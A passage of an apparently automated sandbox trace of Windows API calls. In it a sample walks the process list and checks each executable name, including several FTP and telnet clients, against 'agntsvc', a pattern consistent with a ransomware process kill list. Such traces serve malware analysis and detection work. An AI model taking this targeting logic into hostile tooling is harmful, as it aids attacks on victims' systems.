lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="swing prefer.exe")) returned 1 [0093.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0093.376] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3566dd0 [0093.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x3566dd0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="swing prefer.exe", lpUsedDefaultChar=0x0) returned 17 [0093.376] lstrcpyA (in: lpString1=0x567fabc, lpString2="swing prefer.exe" | out: lpString1="swing prefer.exe") returned="swing prefer.exe" [0093.377] StrStrIA (lpFirst="swing prefer.exe", lpSrch="agntsvc") returned 0x0 [0093.377] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="vietnamese_mature_hat.exe")) returned 1 [0093.378] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0093.378] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x3566598 [0093.378] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x3566598, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vietnamese_mature_hat.exe", lpUsedDefaultChar=0x0) returned 26 [0093.378] lstrcpyA (in: lpString1=0x567fabc, lpString2="vietnamese_mature_hat.exe" | out: lpString1="vietnamese_mature_hat.exe") returned="vietnamese_mature_hat.exe" [0093.378] StrStrIA (lpFirst="vietnamese_mature_hat.exe", lpSrch="agntsvc") returned 0x0 [0093.378] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="nights-attending.exe")) returned 1 [0093.379] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0093.379] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3566e70 [0093.379] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x3566e70, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nights-attending.exe", lpUsedDefaultChar=0x0) returned 21 [0093.379] lstrcpyA (in: lpString1=0x567fabc, lpString2="nights-attending.exe" | out: lpString1="nights-attending.exe") returned="nights-attending.exe" [0093.379] StrStrIA (lpFirst="nights-attending.exe", lpSrch="agntsvc") returned 0x0 [0093.379] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="installed.exe")) returned 1 [0093.380] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0093.380] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x35675d8 [0093.380] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x35675d8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="installed.exe", lpUsedDefaultChar=0x0) returned 14 [0093.381] lstrcpyA (in: lpString1=0x567fabc, lpString2="installed.exe" | out: lpString1="installed.exe") returned="installed.exe" [0093.381] StrStrIA (lpFirst="installed.exe", lpSrch="agntsvc") returned 0x0 [0093.381] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="references compounds.exe")) returned 1 [0093.382] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0093.382] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x35665c0 [0093.382] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x35665c0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="references compounds.exe", lpUsedDefaultChar=0x0) returned 25 [0093.382] lstrcpyA (in: lpString1=0x567fabc, lpString2="references compounds.exe" | out: lpString1="references compounds.exe") returned="references compounds.exe" [0093.382] StrStrIA (lpFirst="references compounds.exe", lpSrch="agntsvc") returned 0x0 [0093.382] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="albuquerque_left.exe")) returned 1 [0093.383] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0093.383] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3566cb0 [0093.383] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x3566cb0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="albuquerque_left.exe", lpUsedDefaultChar=0x0) returned 21 [0093.383] lstrcpyA (in: lpString1=0x567fabc, lpString2="albuquerque_left.exe" | out: lpString1="albuquerque_left.exe") returned="albuquerque_left.exe" [0093.383] StrStrIA (lpFirst="albuquerque_left.exe", lpSrch="agntsvc") returned 0x0 [0093.383] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="registered try.exe")) returned 1 [0093.384] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0093.384] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3566df0 [0093.384] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x3566df0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="registered try.exe", lpUsedDefaultChar=0x0) returned 19 [0093.384] lstrcpyA (in: lpString1=0x567fabc, lpString2="registered try.exe" | out: lpString1="registered try.exe") returned="registered try.exe" [0093.384] StrStrIA (lpFirst="registered try.exe", lpSrch="agntsvc") returned 0x0 [0093.384] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="consultancy statute ide.exe")) returned 1 [0093.385] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0093.385] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x3566610 [0093.385] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x3566610, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="consultancy statute ide.exe", lpUsedDefaultChar=0x0) returned 28 [0093.385] lstrcpyA (in: lpString1=0x567fabc, lpString2="consultancy statute ide.exe" | out: lpString1="consultancy statute ide.exe") returned="consultancy statute ide.exe" [0093.385] StrStrIA (lpFirst="consultancy statute ide.exe", lpSrch="agntsvc") returned 0x0 [0093.385] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x67c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="invite.exe")) returned 1 [0093.386] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0093.386] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35674d0 [0093.386] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x35674d0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="invite.exe", lpUsedDefaultChar=0x0) returned 11 [0093.386] lstrcpyA (in: lpString1=0x567fabc, lpString2="invite.exe" | out: lpString1="invite.exe") returned="invite.exe" [0093.386] StrStrIA (lpFirst="invite.exe", lpSrch="agntsvc") returned 0x0 [0093.386] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="idol.exe")) returned 1 [0093.387] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0093.387] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x35676e0 [0093.387] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x35676e0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="idol.exe", lpUsedDefaultChar=0x0) returned 9 [0093.388] lstrcpyA (in: lpString1=0x567fabc, lpString2="idol.exe" | out: lpString1="idol.exe") returned="idol.exe" [0093.388] StrStrIA (lpFirst="idol.exe", lpSrch="agntsvc") returned 0x0 [0093.388] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="latitude qualifications.exe")) returned 1 [0093.389] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0093.389] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x3566660 [0093.389] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x3566660, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="latitude qualifications.exe", lpUsedDefaultChar=0x0) returned 28 [0093.389] lstrcpyA (in: lpString1=0x567fabc, lpString2="latitude qualifications.exe" | out: lpString1="latitude qualifications.exe") returned="latitude qualifications.exe" [0093.389] StrStrIA (lpFirst="latitude qualifications.exe", lpSrch="agntsvc") returned 0x0 [0093.389] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="lauderdaletransmittedwasher.exe")) returned 1 [0093.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0093.390] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x3566638 [0093.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x3566638, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lauderdaletransmittedwasher.exe", lpUsedDefaultChar=0x0) returned 32 [0093.390] lstrcpyA (in: lpString1=0x567fabc, lpString2="lauderdaletransmittedwasher.exe" | out: lpString1="lauderdaletransmittedwasher.exe") returned="lauderdaletransmittedwasher.exe" [0093.390] StrStrIA (lpFirst="lauderdaletransmittedwasher.exe", lpSrch="agntsvc") returned 0x0 [0093.390] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="powell_jane.exe")) returned 1 [0093.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0093.391] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x35674e8 [0093.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x35674e8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="powell_jane.exe", lpUsedDefaultChar=0x0) returned 16 [0093.391] lstrcpyA (in: lpString1=0x567fabc, lpString2="powell_jane.exe" | out: lpString1="powell_jane.exe") returned="powell_jane.exe" [0093.391] StrStrIA (lpFirst="powell_jane.exe", lpSrch="agntsvc") returned 0x0 [0093.391] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="laboratorysaving.exe")) returned 1 [0093.396] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0093.396] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3566f10 [0093.396] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x3566f10, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="laboratorysaving.exe", lpUsedDefaultChar=0x0) returned 21 [0093.396] lstrcpyA (in: lpString1=0x567fabc, lpString2="laboratorysaving.exe" | out: lpString1="laboratorysaving.exe") returned="laboratorysaving.exe" [0093.396] StrStrIA (lpFirst="laboratorysaving.exe", lpSrch="agntsvc") returned 0x0 [0093.397] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x798, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gainedshape.exe")) returned 1 [0093.397] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0093.397] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3567500 [0093.398] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x3567500, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gainedshape.exe", lpUsedDefaultChar=0x0) returned 16 [0093.398] lstrcpyA (in: lpString1=0x567fabc, lpString2="gainedshape.exe" | out: lpString1="gainedshape.exe") returned="gainedshape.exe" [0093.398] StrStrIA (lpFirst="gainedshape.exe", lpSrch="agntsvc") returned 0x0 [0093.398] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="opens-versions.exe")) returned 1 [0093.399] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0093.399] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3566d70 [0093.399] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x3566d70, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="opens-versions.exe", lpUsedDefaultChar=0x0) returned 19 [0093.399] lstrcpyA (in: lpString1=0x567fabc, lpString2="opens-versions.exe" | out: lpString1="opens-versions.exe") returned="opens-versions.exe" [0093.399] StrStrIA (lpFirst="opens-versions.exe", lpSrch="agntsvc") returned 0x0 [0093.399] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="workers_dedicated_alloy.exe")) returned 1 [0093.400] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0093.400] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x3566868 [0093.400] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x3566868, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="workers_dedicated_alloy.exe", lpUsedDefaultChar=0x0) returned 28 [0093.400] lstrcpyA (in: lpString1=0x567fabc, lpString2="workers_dedicated_alloy.exe" | out: lpString1="workers_dedicated_alloy.exe") returned="workers_dedicated_alloy.exe" [0093.400] StrStrIA (lpFirst="workers_dedicated_alloy.exe", lpSrch="agntsvc") returned 0x0 [0093.400] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0093.401] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0093.401] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35676f8 [0093.401] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x35676f8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3dftp.exe", lpUsedDefaultChar=0x0) returned 10 [0093.401] lstrcpyA (in: lpString1=0x567fabc, lpString2="3dftp.exe" | out: lpString1="3dftp.exe") returned="3dftp.exe" [0093.401] StrStrIA (lpFirst="3dftp.exe", lpSrch="agntsvc") returned 0x0 [0093.401] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x888, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0093.402] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0093.402] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3566cd0 [0093.402] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x3566cd0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="absolutetelnet.exe", lpUsedDefaultChar=0x0) returned 19 [0093.402] lstrcpyA (in: lpString1=0x567fabc, lpString2="absolutetelnet.exe" | out: lpString1="absolutetelnet.exe") returned="absolutetelnet.exe" [0093.402] StrStrIA (lpFirst="absolutetelnet.exe", lpSrch="agntsvc") returned 0x0 [0093.402] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0093.403] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0093.403] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3567518 [0093.403] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x3567518, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="alftp.exe", lpUsedDefaultChar=0x0) returned 10 [0093.403] lstrcpyA (in: lpString1=0x567fabc, lpString2="alftp.exe" | out: lpString1="alftp.exe") returned="alftp.exe" [0093.403] StrStrIA (lpFirst="alftp.exe", lpSrch="agntsvc") returned 0x0 [0093.403] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0093.404] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0093.404] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3567530 [0093.404] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x3567530, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="barca.exe", lpUsedDefaultChar=0x0) returned 10 [0093.404] lstrcpyA (in: lpString1=0x567fabc, lpString2="barca.exe" | out: lpString1="barca.exe") returned="barca.exe" [0093.404] StrStrIA (lpFirst="barca.exe", lpSrch="agntsvc") returned 0x0 [0093.405] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0093.406] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0093.406] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3567578 [0093.406] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x3567578, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bitkinex.exe", lpUsedDefaultChar=0x0) returned 13 [0093.406] lstrcpyA (in: lpString1=0x567fabc, lpString2="bitkinex.exe" | out: lpString1="bitkinex.exe") returned="bitkinex.exe" [0093.406] StrStrIA (lpFirst="bitkinex.exe", lpSrch="agntsvc") returned 0x0 [0093.406] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0093.407] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.407] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3567668 [0093.407] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x3567668, 